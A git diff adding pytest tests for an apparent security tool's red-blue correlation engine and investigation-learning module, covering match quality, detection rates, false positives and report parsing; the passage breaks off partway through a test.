Call escalate_investigation() if:
- Active, ongoing attack detected
diff --git a/tests/test_correlation.py b/tests/test_correlation.py
new file mode 100644
index 00000000..8819735e
--- /dev/null
+++ b/tests/test_correlation.py
@@ -0,0 +1,735 @@
+"""Tests for the Red-Blue Correlation Engine."""
+
+import tempfile
+from datetime import datetime, timedelta, timezone
+from pathlib import Path
+
+import pytest
+
+from ares.core.correlation import (
+ BlueTeamDetection,
+ CorrelationMatch,
+ CorrelationReport,
+ DetectionGap,
+ RedBlueCorrelator,
+ RedTeamActivity,
+)
+
+
+@pytest.fixture
+def temp_reports_dir() -> Path:
+    """Yield a fresh temporary directory for report files; it is deleted after the test."""
+    with tempfile.TemporaryDirectory() as tmpdir:
+        yield Path(tmpdir)
+
+
+@pytest.fixture
+def sample_red_activity() -> RedTeamActivity:
+ """Create a sample red team activity."""
+ return RedTeamActivity(
+ timestamp=datetime(2024, 1, 15, 10, 30, 0, tzinfo=timezone.utc),
+ technique_id="T1059.001",
+ technique_name="PowerShell",
+ action="Executed PowerShell command for reconnaissance",
+ target_ip="192.168.1.100",
+ target_host="server01",
+ credential_used="admin",
+ success=True,
+ metadata={"command": "Get-Process"},
+ )
+
+
+@pytest.fixture
+def sample_blue_detection() -> BlueTeamDetection:
+ """Create a sample blue team detection."""
+ return BlueTeamDetection(
+ timestamp=datetime(2024, 1, 15, 10, 32, 0, tzinfo=timezone.utc),
+ alert_name="Suspicious PowerShell Activity",
+ technique_id="T1059.001",
+ severity="high",
+ target_ip="192.168.1.100",
+ target_host="server01",
+ investigation_id="inv-001",
+ status="completed",
+ evidence_count=5,
+ highest_pyramid_level=3,
+ metadata={"rule_id": "rule-ps-001"},
+ )
+
+
+class TestRedTeamActivity:
+ """Tests for RedTeamActivity dataclass."""
+
+ def test_key_generation(self, sample_red_activity: RedTeamActivity) -> None:
+ """Test unique key generation."""
+ key = sample_red_activity.key
+
+ assert "2024-01-15" in key
+ assert "T1059.001" in key
+ assert "192.168.1.100" in key
+
+ def test_key_uniqueness(self) -> None:
+ """Test that different activities have different keys."""
+ activity1 = RedTeamActivity(
+ timestamp=datetime(2024, 1, 15, 10, 30, 0, tzinfo=timezone.utc),
+ technique_id="T1059.001",
+ technique_name="PowerShell",
+ action="Action 1",
+ target_ip="192.168.1.100",
+ target_host=None,
+ credential_used=None,
+ success=True,
+ )
+ activity2 = RedTeamActivity(
+ timestamp=datetime(2024, 1, 15, 10, 31, 0, tzinfo=timezone.utc),
+ technique_id="T1059.001",
+ technique_name="PowerShell",
+ action="Action 2",
+ target_ip="192.168.1.100",
+ target_host=None,
+ credential_used=None,
+ success=True,
+ )
+
+ assert activity1.key != activity2.key
+
+
+class TestBlueTeamDetection:
+ """Tests for BlueTeamDetection dataclass."""
+
+ def test_key_generation(self, sample_blue_detection: BlueTeamDetection) -> None:
+ """Test unique key generation."""
+ key = sample_blue_detection.key
+
+ assert "2024-01-15" in key
+ assert "T1059.001" in key
+ assert "Suspicious PowerShell Activity" in key
+
+
+class TestCorrelationMatch:
+ """Tests for CorrelationMatch dataclass."""
+
+ def test_match_quality_strong(
+ self,
+ sample_red_activity: RedTeamActivity,
+ sample_blue_detection: BlueTeamDetection,
+ ) -> None:
+ """Test strong match quality classification."""
+ match = CorrelationMatch(
+ red_activity=sample_red_activity,
+ blue_detection=sample_blue_detection,
+ time_delta_seconds=120.0, # 2 minutes
+ technique_match=True,
+ target_match=True,
+ confidence=0.9,
+ )
+
+ assert match.match_quality == "STRONG"
+
+ def test_match_quality_good(
+ self,
+ sample_red_activity: RedTeamActivity,
+ sample_blue_detection: BlueTeamDetection,
+ ) -> None:
+ """Test good match quality classification."""
+ match = CorrelationMatch(
+ red_activity=sample_red_activity,
+ blue_detection=sample_blue_detection,
+ time_delta_seconds=400.0, # ~7 minutes
+ technique_match=True,
+ target_match=False,
+ confidence=0.6,
+ )
+
+ assert match.match_quality == "GOOD"
+
+ def test_match_quality_weak(
+ self,
+ sample_red_activity: RedTeamActivity,
+ sample_blue_detection: BlueTeamDetection,
+ ) -> None:
+ """Test weak match quality classification."""
+ match = CorrelationMatch(
+ red_activity=sample_red_activity,
+ blue_detection=sample_blue_detection,
+ time_delta_seconds=700.0, # ~12 minutes
+ technique_match=True,
+ target_match=False,
+ confidence=0.4,
+ )
+
+ assert match.match_quality == "WEAK"
+
+ def test_match_quality_tenuous(
+ self,
+ sample_red_activity: RedTeamActivity,
+ sample_blue_detection: BlueTeamDetection,
+ ) -> None:
+ """Test tenuous match quality classification."""
+ match = CorrelationMatch(
+ red_activity=sample_red_activity,
+ blue_detection=sample_blue_detection,
+ time_delta_seconds=700.0,
+ technique_match=False,
+ target_match=False,
+ confidence=0.2,
+ )
+
+ assert match.match_quality == "TENUOUS"
+
+
+class TestCorrelationReport:
+ """Tests for CorrelationReport dataclass."""
+
+ def test_to_dict(
+ self,
+ sample_red_activity: RedTeamActivity,
+ sample_blue_detection: BlueTeamDetection,
+ ) -> None:
+ """Test conversion to dictionary."""
+ match = CorrelationMatch(
+ red_activity=sample_red_activity,
+ blue_detection=sample_blue_detection,
+ time_delta_seconds=120.0,
+ technique_match=True,
+ target_match=True,
+ confidence=0.9,
+ )
+
+ gap = DetectionGap(
+ red_activity=sample_red_activity,
+ reason="No alert rule configured",
+ recommended_detection="Add PowerShell monitoring",
+ )
+
+ report = CorrelationReport(
+ analysis_timestamp=datetime.now(timezone.utc),
+ red_operation_id="op-001",
+ time_window_start=datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc),
+ time_window_end=datetime(2024, 1, 15, 11, 0, 0, tzinfo=timezone.utc),
+ total_red_activities=10,
+ total_blue_detections=8,
+ matched_activities=7,
+ undetected_activities=3,
+ false_positive_detections=1,
+ matches=[match],
+ gaps=[gap],
+ false_positives=[sample_blue_detection],
+ detection_rate=0.7,
+ false_positive_rate=0.125,
+ mean_time_to_detect=120.0,
+ technique_coverage={
+ "T1059.001": {"total": 5, "detected": 4, "missed": 1, "detection_rate": 0.8}
+ },
+ )
+
+ data = report.to_dict()
+
+ assert data["red_operation_id"] == "op-001"
+ assert data["summary"]["total_red_activities"] == 10
+ assert data["summary"]["detection_rate"] == "70.0%"
+ assert len(data["matches"]) == 1
+ assert len(data["gaps"]) == 1
+ assert "T1059.001" in data["technique_coverage"]
+
+
+class TestRedBlueCorrelator:
+ """Tests for RedBlueCorrelator."""
+
+ def test_init(self, temp_reports_dir: Path) -> None:
+ """Test correlator initialization."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ assert correlator.reports_dir == temp_reports_dir
+ assert correlator.time_window == timedelta(minutes=30)
+
+ def test_init_custom_time_window(self, temp_reports_dir: Path) -> None:
+ """Test correlator with custom time window."""
+ correlator = RedBlueCorrelator(temp_reports_dir, time_window_minutes=60)
+
+ assert correlator.time_window == timedelta(minutes=60)
+
+ def test_correlate_perfect_match(
+ self,
+ temp_reports_dir: Path,
+ sample_red_activity: RedTeamActivity,
+ sample_blue_detection: BlueTeamDetection,
+ ) -> None:
+ """Test correlation with perfect technique and target match."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ report = correlator.correlate(
+ red_activities=[sample_red_activity],
+ blue_detections=[sample_blue_detection],
+ operation_id="test-op",
+ )
+
+ assert report.total_red_activities == 1
+ assert report.total_blue_detections == 1
+ assert report.matched_activities == 1
+ assert report.undetected_activities == 0
+ assert len(report.matches) == 1
+ assert report.matches[0].technique_match is True
+ assert report.matches[0].target_match is True
+
+ def test_correlate_no_match_outside_time_window(
+ self, temp_reports_dir: Path, sample_red_activity: RedTeamActivity
+ ) -> None:
+ """Test that activities outside time window are not matched."""
+ correlator = RedBlueCorrelator(temp_reports_dir, time_window_minutes=10)
+
+ # Detection 1 hour after activity
+ late_detection = BlueTeamDetection(
+ timestamp=sample_red_activity.timestamp + timedelta(hours=1),
+ alert_name="Late Detection",
+ technique_id="T1059.001",
+ severity="high",
+ target_ip="192.168.1.100",
+ target_host=None,
+ investigation_id="inv-late",
+ status="completed",
+ evidence_count=1,
+ highest_pyramid_level=1,
+ )
+
+ report = correlator.correlate(
+ red_activities=[sample_red_activity],
+ blue_detections=[late_detection],
+ operation_id="test-op",
+ )
+
+ assert report.matched_activities == 0
+ assert report.undetected_activities == 1
+
+ def test_correlate_technique_mismatch(
+ self, temp_reports_dir: Path, sample_red_activity: RedTeamActivity
+ ) -> None:
+ """Test correlation with technique mismatch."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ wrong_technique_detection = BlueTeamDetection(
+ timestamp=sample_red_activity.timestamp + timedelta(minutes=2),
+ alert_name="Different Technique",
+ technique_id="T1003.001", # Different technique
+ severity="high",
+ target_ip="192.168.1.100",
+ target_host=None,
+ investigation_id="inv-001",
+ status="completed",
+ evidence_count=1,
+ highest_pyramid_level=1,
+ )
+
+ report = correlator.correlate(
+ red_activities=[sample_red_activity],
+ blue_detections=[wrong_technique_detection],
+ operation_id="test-op",
+ )
+
+ # Should still match based on target and time proximity
+ assert len(report.matches) == 1
+ assert report.matches[0].technique_match is False
+ assert report.matches[0].target_match is True
+
+    def test_correlate_multiple_activities(self, temp_reports_dir: Path) -> None:
+        """Test that 3 of 5 activities are matched, giving a 60% detection rate."""
+        correlator = RedBlueCorrelator(temp_reports_dir)
+        base_time = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc)
+
+        # Use different target IPs to prevent cross-matching via target
+        red_activities = [
+            RedTeamActivity(
+                timestamp=base_time + timedelta(minutes=i * 10),
+                technique_id=f"T100{i}",
+                technique_name=f"Technique {i}",
+                action=f"Action {i}",
+                target_ip=f"192.168.1.{100 + i}",  # Different IPs
+                target_host=None,
+                credential_used=None,
+                success=True,
+            )
+            for i in range(5)
+        ]
+
+        # Only detect 3 of 5 activities (matching technique and target)
+        blue_detections = [
+            BlueTeamDetection(
+                timestamp=base_time + timedelta(minutes=i * 10 + 2),
+                alert_name=f"Alert {i}",
+                technique_id=f"T100{i}",
+                severity="high",
+                target_ip=f"192.168.1.{100 + i}",  # Matching IPs
+                target_host=None,
+                investigation_id=f"inv-{i}",
+                status="completed",
+                evidence_count=1,
+                highest_pyramid_level=1,
+            )
+            for i in [0, 2, 4]  # Only detect activities 0, 2, 4
+        ]
+
+        report = correlator.correlate(
+            red_activities=red_activities,
+            blue_detections=blue_detections,
+            operation_id="test-op",
+        )
+
+        assert report.total_red_activities == 5
+        assert report.total_blue_detections == 3
+        assert report.matched_activities == 3
+        assert report.undetected_activities == 2
+        assert report.detection_rate == pytest.approx(0.6)  # computed ratio; avoid exact float ==
+
+ def test_correlate_empty_activities(self, temp_reports_dir: Path) -> None:
+ """Test correlation with no activities."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ report = correlator.correlate(
+ red_activities=[],
+ blue_detections=[],
+ operation_id="empty-op",
+ )
+
+ assert report.total_red_activities == 0
+ assert report.detection_rate == 0.0
+
+ def test_correlate_identifies_false_positives(
+ self, temp_reports_dir: Path, sample_red_activity: RedTeamActivity
+ ) -> None:
+ """Test that unmatched detections are identified as false positives."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ # Detection without corresponding red activity
+ unrelated_detection = BlueTeamDetection(
+ timestamp=sample_red_activity.timestamp + timedelta(minutes=5),
+ alert_name="Unrelated Alert",
+ technique_id="T9999", # No matching red activity
+ severity="low",
+ target_ip="10.0.0.1", # Different target
+ target_host=None,
+ investigation_id="inv-fp",
+ status="completed",
+ evidence_count=0,
+ highest_pyramid_level=0,
+ )
+
+ report = correlator.correlate(
+ red_activities=[sample_red_activity],
+ blue_detections=[
+ BlueTeamDetection(
+ timestamp=sample_red_activity.timestamp + timedelta(minutes=2),
+ alert_name="Matching Alert",
+ technique_id="T1059.001",
+ severity="high",
+ target_ip="192.168.1.100",
+ target_host=None,
+ investigation_id="inv-001",
+ status="completed",
+ evidence_count=1,
+ highest_pyramid_level=1,
+ ),
+ unrelated_detection,
+ ],
+ operation_id="test-op",
+ )
+
+ assert len(report.false_positives) == 1
+ assert report.false_positives[0].alert_name == "Unrelated Alert"
+
+ def test_technique_coverage_calculation(self, temp_reports_dir: Path) -> None:
+ """Test technique coverage calculation."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+ base_time = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc)
+
+ # Create activities with DIFFERENT techniques and targets for clear matching
+ # This ensures each activity can only match its corresponding detection
+ red_activities = [
+ RedTeamActivity(
+ timestamp=base_time + timedelta(minutes=i * 10),
+ technique_id=f"T105{i}", # Different technique per activity
+ technique_name=f"Technique {i}",
+ action=f"Action {i}",
+ target_ip=f"192.168.1.{100 + i}", # Different targets
+ target_host=None,
+ credential_used=None,
+ success=True,
+ )
+ for i in range(4)
+ ]
+
+ # Only detect 3 of 4 (activities 0, 1, 2 but not 3)
+ blue_detections = [
+ BlueTeamDetection(
+ timestamp=base_time + timedelta(minutes=i * 10, seconds=30),
+ alert_name=f"Alert {i}",
+ technique_id=f"T105{i}", # Matching technique
+ severity="high",
+ target_ip=f"192.168.1.{100 + i}", # Matching targets
+ target_host=None,
+ investigation_id=f"inv-{i}",
+ status="completed",
+ evidence_count=1,
+ highest_pyramid_level=1,
+ )
+ for i in range(3) # Only first 3 activities get detected
+ ]
+
+ report = correlator.correlate(
+ red_activities=red_activities,
+ blue_detections=blue_detections,
+ operation_id="test-op",
+ )
+
+ # Should have coverage data for all 4 techniques
+ assert len(report.technique_coverage) == 4
+ # 3 techniques should be detected (T1050, T1051, T1052)
+ # 1 technique should be missed (T1053)
+ detected_count = sum(1 for t in report.technique_coverage.values() if t["detected"] > 0)
+ missed_count = sum(1 for t in report.technique_coverage.values() if t["missed"] > 0)
+ assert detected_count == 3
+ assert missed_count == 1
+ assert report.matched_activities == 3
+ assert report.undetected_activities == 1
+
+ def test_mean_time_to_detect(
+ self,
+ temp_reports_dir: Path,
+ ) -> None:
+ """Test mean time to detect calculation."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+ base_time = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc)
+
+ red_activities = [
+ RedTeamActivity(
+ timestamp=base_time,
+ technique_id="T1059.001",
+ technique_name="PowerShell",
+ action="Action 1",
+ target_ip="192.168.1.100",
+ target_host=None,
+ credential_used=None,
+ success=True,
+ ),
+ RedTeamActivity(
+ timestamp=base_time + timedelta(minutes=10),
+ technique_id="T1059.002",
+ technique_name="Script",
+ action="Action 2",
+ target_ip="192.168.1.100",
+ target_host=None,
+ credential_used=None,
+ success=True,
+ ),
+ ]
+
+ blue_detections = [
+ BlueTeamDetection(
+ timestamp=base_time + timedelta(seconds=60), # 60s after
+ alert_name="Alert 1",
+ technique_id="T1059.001",
+ severity="high",
+ target_ip="192.168.1.100",
+ target_host=None,
+ investigation_id="inv-1",
+ status="completed",
+ evidence_count=1,
+ highest_pyramid_level=1,
+ ),
+ BlueTeamDetection(
+ timestamp=base_time + timedelta(minutes=10, seconds=120), # 120s after
+ alert_name="Alert 2",
+ technique_id="T1059.002",
+ severity="high",
+ target_ip="192.168.1.100",
+ target_host=None,
+ investigation_id="inv-2",
+ status="completed",
+ evidence_count=1,
+ highest_pyramid_level=1,
+ ),
+ ]
+
+ report = correlator.correlate(
+ red_activities=red_activities,
+ blue_detections=blue_detections,
+ operation_id="test-op",
+ )
+
+ # Mean of 60s and 120s = 90s
+ assert report.mean_time_to_detect == 90.0
+
+ def test_generate_report_markdown(
+ self,
+ temp_reports_dir: Path,
+ sample_red_activity: RedTeamActivity,
+ sample_blue_detection: BlueTeamDetection,
+ ) -> None:
+ """Test markdown report generation."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ report = correlator.correlate(
+ red_activities=[sample_red_activity],
+ blue_detections=[sample_blue_detection],
+ operation_id="test-op",
+ )
+
+ markdown = correlator.generate_report_markdown(report)
+
+ assert "# Red-Blue Correlation Report" in markdown
+ assert "Executive Summary" in markdown
+ assert "test-op" in markdown
+ assert "Detection Rate" in markdown
+
+ def test_load_red_team_report_basic(self, temp_reports_dir: Path) -> None:
+ """Test loading a basic red team report."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ # Create a sample red team report
+ report_content = """# Red Team Operation Report
+
+**Operation ID**: op-test-001
+**Target**: 192.168.1.100
+**Started**: 2024-01-15 10:00:00 UTC
+
+### Hosts (3)
+Found 3 hosts during scanning.
+
+### Credentials (2)
+**admin**
+Source: password guessing
+
+**backup**
+Source: credential dumping
+
+### Timeline of Key Events
+| Timestamp | Event | Technique |
+|-----------|-------|-----------|
+| 2024-01-15T10:05:00Z | Initial access | T1078 |
+| 2024-01-15T10:10:00Z | Privilege escalation | T1068 |
+
+**Domain Admin Access**: ✓
+**Golden Ticket**: ✓
+"""
+ report_path = temp_reports_dir / "redteam-op-test-001.md"
+ report_path.write_text(report_content)
+
+ operation_id, activities = correlator.load_red_team_report(report_path)
+
+ assert operation_id == "op-test-001"
+ assert len(activities) > 0
+
+ # Check for network discovery activity
+ discovery = next((a for a in activities if a.technique_id == "T1046"), None)
+ assert discovery is not None
+ assert "3 host" in discovery.action
+
+ def test_load_investigation_report(self, temp_reports_dir: Path) -> None:
+ """Test loading an investigation report."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ report_content = """# Investigation Report
+
+**Investigation ID:** `inv-20240115-001`
+
+| Field | Value |
+|-------|-------|
+| Alert Name | Suspicious PowerShell Activity |
+| Severity | high |
+| Status | completed |
+
+Alert payload contains:
+"startsAt": "2024-01-15T10:30:00Z"
+
+Target IP: 192.168.1.100
+
+Technique: T1059.001
+
+**Evidence Collected:** 5
+**Highest Pyramid Level:** 3
+"""
+ report_path = temp_reports_dir / "investigation_20240115_103000.md"
+ report_path.write_text(report_content)
+
+ detection = correlator.load_investigation_report(report_path)
+
+ assert detection is not None
+ assert detection.investigation_id == "inv-20240115-001"
+ assert detection.alert_name == "Suspicious PowerShell Activity"
+ assert detection.severity == "high"
+ assert detection.technique_id == "T1059.001"
+ assert detection.evidence_count == 5
+ assert detection.highest_pyramid_level == 3
+
+ def test_load_investigation_report_skips_no_data(self, temp_reports_dir: Path) -> None:
+ """Test that DatasourceNoData reports are skipped."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ report_path = temp_reports_dir / "investigation_DatasourceNoData_20240115.md"
+ report_path.write_text("Some content")
+
+ detection = correlator.load_investigation_report(report_path)
+
+ assert detection is None
+
+    def test_load_all_reports(self, temp_reports_dir: Path) -> None:
+        """Test that load_all_reports picks up report files and ignores unrelated markdown."""
+        correlator = RedBlueCorrelator(temp_reports_dir)
+
+        # Create red team report
+        red_report = temp_reports_dir / "redteam-op001.md"
+        red_report.write_text("""# Red Team Report
+**Operation ID**: op001
+**Target**: 192.168.1.1
+**Started**: 2024-01-15 10:00:00 UTC
+### Hosts (1)
+### Credentials (0)
+""")
+
+        # Create investigation report
+        inv_report = temp_reports_dir / "investigation_20240115.md"
+        inv_report.write_text("""# Investigation
+**Investigation ID:** `inv-001`
+| Alert Name | Test Alert |
+| Severity | high |
+| Status | completed |
+"startsAt": "2024-01-15T10:30:00Z"
+**Evidence Collected:** 1
+**Highest Pyramid Level:** 1
+""")
+
+        # Create non-report file (should be ignored)
+        other_file = temp_reports_dir / "readme.md"
+        other_file.write_text("# README")
+
+        red_reports, blue_detections = correlator.load_all_reports()
+
+        assert len(red_reports) == 1
+        assert red_reports[0][0] == "op001"
+        assert len(blue_detections) <= 1  # At most the one investigation report
+
+
+class TestDetectionGap:
+    """Tests for constructing DetectionGap with and without its optional fields."""
+
+    def test_gap_with_recommendation(self, sample_red_activity: RedTeamActivity) -> None:
+        """Test that reason, recommendation and data sources are stored as given."""
+        gap = DetectionGap(
+            red_activity=sample_red_activity,
+            reason="No alert rule configured",
+            recommended_detection="Add PowerShell monitoring rule",
+            mitre_data_sources=["Process: Process Creation", "Script: Script Execution"],
+        )
+
+        assert gap.reason == "No alert rule configured"
+        assert gap.recommended_detection == "Add PowerShell monitoring rule"
+        assert len(gap.mitre_data_sources) == 2
+
+    def test_gap_without_recommendation(self, sample_red_activity: RedTeamActivity) -> None:
+        """Test that omitted optional fields default to None and an empty list."""
+        gap = DetectionGap(
+            red_activity=sample_red_activity,
+            reason="Unknown technique",
+        )
+
+        assert gap.recommended_detection is None
+        assert gap.mitre_data_sources == []
diff --git a/tests/test_learning.py b/tests/test_learning.py
new file mode 100644
index 00000000..7262e8e4
--- /dev/null
+++ b/tests/test_learning.py
@@ -0,0 +1,529 @@
+"""Tests for the Learning Tools module."""
+
+import tempfile
+from datetime import datetime, timedelta, timezone
+from pathlib import Path
+
+import pytest
+
+from ares.core.persistence import InvestigationStore, StoredInvestigation
+from ares.tools.blue.learning import LearningTools
+
+
+@pytest.fixture
+def temp_db() -> Path:
+    """Yield a database file path inside a temporary directory deleted after the test."""
+    with tempfile.TemporaryDirectory() as tmpdir:
+        yield Path(tmpdir) / "test_learning.db"
+
+
+@pytest.fixture
+def store(temp_db: Path) -> InvestigationStore:
+ """Create a fresh investigation store."""
+ return InvestigationStore(temp_db)
+
+
+@pytest.fixture
+def learning_tools(store: InvestigationStore) -> LearningTools:
+ """Create learning tools with test store."""
+ return LearningTools(store=store)
+
+
+@pytest.fixture
+def populated_store(store: InvestigationStore) -> InvestigationStore:
+ """Create a store with sample investigation data."""
+ now = datetime.now(timezone.utc)
+
+ # Create several investigations
+ investigations = [
+ StoredInvestigation(
+ investigation_id=f"inv-{i}",
+ alert_name="HighCPUUsage",
+ alert_fingerprint="rule-cpu-001",
+ severity="warning",
+ technique_id="T1059.001",
+ technique_name="PowerShell",
+ started_at=now - timedelta(hours=i),
+ completed_at=now - timedelta(hours=i) + timedelta(minutes=10),
+ duration_seconds=600.0,
+ status="completed",
+ evidence_count=i + 1,
+ highest_pyramid_level=min(i, 4),
+ techniques_identified=["T1059.001"],
+ queries_executed=[{"query": "{job='windows'}", "result_count": i}],
+ query_success_rate=0.7,
+ effective_queries=["{job='windows'} |= 'powershell'"],
+ is_true_positive=i % 2 == 0, # Alternating true/false
+ )
+ for i in range(5)
+ ]
+
+ # Add a different alert type
+ investigations.append(
+ StoredInvestigation(
+ investigation_id="inv-different",
+ alert_name="SuspiciousLogin",
+ alert_fingerprint="rule-login-001",
+ severity="high",
+ technique_id="T1078",
+ technique_name="Valid Accounts",
+ started_at=now - timedelta(hours=1),
+ completed_at=now - timedelta(minutes=50),
+ duration_seconds=600.0,
+ status="completed",
+ evidence_count=3,
+ highest_pyramid_level=2,
+ techniques_identified=["T1078"],
+ queries_executed=[{"query": "{job='auth'}", "result_count": 5}],
+ query_success_rate=0.8,
+ effective_queries=["{job='auth'} |= 'failed'"],
+ is_true_positive=True,
+ )
+ )
+
+ for inv in investigations:
+ store.store_investigation(inv)
+
+ # Add query effectiveness data
+ for _ in range(5):
+ store.update_query_effectiveness(
+ query_pattern="{job='windows'} |= 'powershell'",
+ successful=True,
+ produced_evidence=True,
+ alert_type="HighCPUUsage",
+ )
+ store.update_query_effectiveness(
+ query_pattern="{job='auth'} |= 'failed'",
+ successful=True,
+ produced_evidence=True,
+ alert_type="SuspiciousLogin",
+ )
+
+ return store
+
+
+@pytest.fixture
+def populated_learning_tools(populated_store: InvestigationStore) -> LearningTools:
+ """Create learning tools with populated store."""
+ return LearningTools(store=populated_store)
+
+
+class TestLearningToolsInit:
+    """Tests for LearningTools construction and store access."""
+
+    def test_init_with_store(self, store: InvestigationStore) -> None:
+        """Test that a provided store is kept as the very same object."""
+        tools = LearningTools(store=store)
+
+        assert tools.store is store
+
+    def test_init_without_store(self) -> None:
+        """Test that the store attribute stays None when no store is passed."""
+        tools = LearningTools()
+
+        assert tools.store is None
+        # Accessing get_store() should get/create global store
+        # (but we won't test that to avoid side effects)
+
+    def test_get_store_returns_provided_store(self, store: InvestigationStore) -> None:
+        """Test that get_store() returns the store passed to the constructor."""
+        tools = LearningTools(store=store)
+
+        assert tools.get_store() is store
+
+
+class TestFindSimilarInvestigations:
+ """Tests for find_similar_investigations tool."""
+
+ @pytest.mark.asyncio
+ async def test_find_similar_no_results(self, learning_tools: LearningTools) -> None:
+ """Test finding similar investigations with empty store."""
+ result = await learning_tools.find_similar_investigations(alert_name="NonexistentAlert")
+
+ assert result["found"] is False
+ assert result["investigations"] == []
+ assert "No similar investigations" in result["message"]
+
+ @pytest.mark.asyncio
+ async def test_find_similar_by_alert_name(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test finding similar investigations by alert name."""
+ result = await populated_learning_tools.find_similar_investigations(
+ alert_name="HighCPUUsage"
+ )
+
+ assert result["found"] is True
+ assert result["count"] >= 1
+ assert len(result["investigations"]) >= 1
+
+ # Check investigation structure
+ inv = result["investigations"][0]
+ assert "investigation_id" in inv
+ assert "alert_name" in inv
+ assert "similarity_score" in inv
+ assert "matching_factors" in inv
+ assert "outcome" in inv
+
+ @pytest.mark.asyncio
+ async def test_find_similar_by_technique(self, populated_learning_tools: LearningTools) -> None:
+ """Test finding similar investigations by technique."""
+ result = await populated_learning_tools.find_similar_investigations(
+ technique_id="T1059.001"
+ )
+
+ assert result["found"] is True
+ assert result["count"] >= 1
+
+ # All results should have the matching technique
+ for inv in result["investigations"]:
+ assert inv["technique_id"] == "T1059.001"
+
+ @pytest.mark.asyncio
+ async def test_find_similar_returns_summary(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test that find_similar returns summary statistics."""
+ result = await populated_learning_tools.find_similar_investigations(
+ alert_name="HighCPUUsage"
+ )
+
+ assert "summary" in result
+ assert "completion_rate" in result["summary"]
+ assert "avg_evidence_count" in result["summary"]
+ assert "true_positives" in result["summary"]
+ assert "false_positives" in result["summary"]
+
+ @pytest.mark.asyncio
+ async def test_find_similar_returns_guidance(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test that find_similar returns investigation guidance."""
+ result = await populated_learning_tools.find_similar_investigations(
+ alert_name="HighCPUUsage"
+ )
+
+ assert "guidance" in result
+ assert isinstance(result["guidance"], str)
+
+ @pytest.mark.asyncio
+ async def test_find_similar_respects_limit(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test that find_similar respects the limit parameter."""
+ result = await populated_learning_tools.find_similar_investigations(
+ alert_name="HighCPUUsage",
+ limit=2,
+ )
+
+ assert len(result["investigations"]) <= 2
+
+ @pytest.mark.asyncio
+ async def test_find_similar_includes_effective_queries(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test that results include effective queries."""
+ result = await populated_learning_tools.find_similar_investigations(
+ alert_name="HighCPUUsage"
+ )
+
+ # At least one investigation should have effective queries
+ has_queries = any(inv.get("effective_queries") for inv in result["investigations"])
+ assert has_queries or result["count"] == 0
+
+
+class TestGetEffectiveQueries:
+ """Tests for get_effective_queries tool."""
+
+ @pytest.mark.asyncio
+ async def test_get_effective_no_data(self, learning_tools: LearningTools) -> None:
+ """Test getting effective queries with no data."""
+ result = await learning_tools.get_effective_queries()
+
+ assert result["found"] is False
+ assert result["queries"] == []
+ assert "No query effectiveness data" in result["message"]
+
+ @pytest.mark.asyncio
+ async def test_get_effective_queries_returns_results(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test getting effective queries with data."""
+ result = await populated_learning_tools.get_effective_queries()
+
+ assert result["found"] is True
+ assert result["count"] >= 1
+ assert len(result["queries"]) >= 1
+
+ # Check query structure
+ query = result["queries"][0]
+ assert "query_pattern" in query
+ assert "total_uses" in query
+ assert "success_rate" in query
+ assert "evidence_rate" in query
+
+ @pytest.mark.asyncio
+ async def test_get_effective_queries_filtered_by_alert(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test getting effective queries filtered by alert type."""
+ result = await populated_learning_tools.get_effective_queries(alert_name="HighCPUUsage")
+
+ # Should only return queries used for this alert
+ for query in result["queries"]:
+ assert "HighCPUUsage" in query["used_for_alerts"]
+
+ @pytest.mark.asyncio
+ async def test_get_effective_queries_respects_limit(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test that get_effective_queries respects the limit."""
+ result = await populated_learning_tools.get_effective_queries(limit=1)
+
+ assert len(result["queries"]) <= 1
+
+ @pytest.mark.asyncio
+ async def test_get_effective_queries_includes_recommendation(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test that results include a recommendation."""
+ result = await populated_learning_tools.get_effective_queries()
+
+ if result["found"]:
+ assert "recommendation" in result
+
+
+class TestCheckFalsePositivePattern:
+    """Exercises the ``check_false_positive_pattern`` learning tool."""
+
+    @pytest.mark.asyncio
+    async def test_check_fp_no_history(self, learning_tools: LearningTools) -> None:
+        """An alert never seen before is reported as an unknown, low-confidence pattern."""
+        verdict = await learning_tools.check_false_positive_pattern(alert_name="NewAlert")
+
+        assert "No historical data" in verdict["message"]
+        assert verdict["confidence"] == "low"
+        assert verdict["is_known_pattern"] is False
+
+    @pytest.mark.asyncio
+    async def test_check_fp_with_history(self, populated_learning_tools: LearningTools) -> None:
+        """An alert with stored investigations yields rate and classification fields."""
+        verdict = await populated_learning_tools.check_false_positive_pattern(
+            alert_name="HighCPUUsage"
+        )
+
+        assert "false_positive_rate" in verdict
+        assert any(key in verdict for key in ("true_positives", "is_known_pattern"))
+
+    @pytest.mark.asyncio
+    async def test_check_fp_high_rate_detection(self, store: InvestigationStore) -> None:
+        """Ten investigations with only two true positives expose a high FP rate."""
+        reference_time = datetime.now(timezone.utc)
+
+        # Indices 0 and 1 are true positives; the remaining eight are false positives.
+        for index in range(10):
+            store.store_investigation(
+                StoredInvestigation(
+                    investigation_id=f"fp-inv-{index}",
+                    alert_name="NoisyAlert",
+                    alert_fingerprint="noisy-rule",
+                    severity="low",
+                    technique_id="T1000",
+                    technique_name="Test",
